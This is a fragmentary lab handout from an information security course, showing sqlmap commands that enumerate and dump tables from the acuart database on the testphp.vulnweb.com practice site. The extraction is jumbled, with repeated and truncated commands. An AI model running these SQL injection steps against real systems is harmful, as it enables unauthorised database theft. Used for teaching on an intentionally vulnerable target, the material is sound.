Operation Sheet 4.1 - SQLInjection
Operation Sheet 4.1 - SQLInjection
1 SQL
Injection in KALI SQLMap
ICT640 – Information Security
sqlmap -u
http://testphp.vulnweb.com/listproduct
s.php?cat=1
-D acuart --tables
Step 4: List information about Tables present in a
particular Database
sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart --tables
Step 5: List information about the columns of a
particular table
sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart -T artists -C aname --dump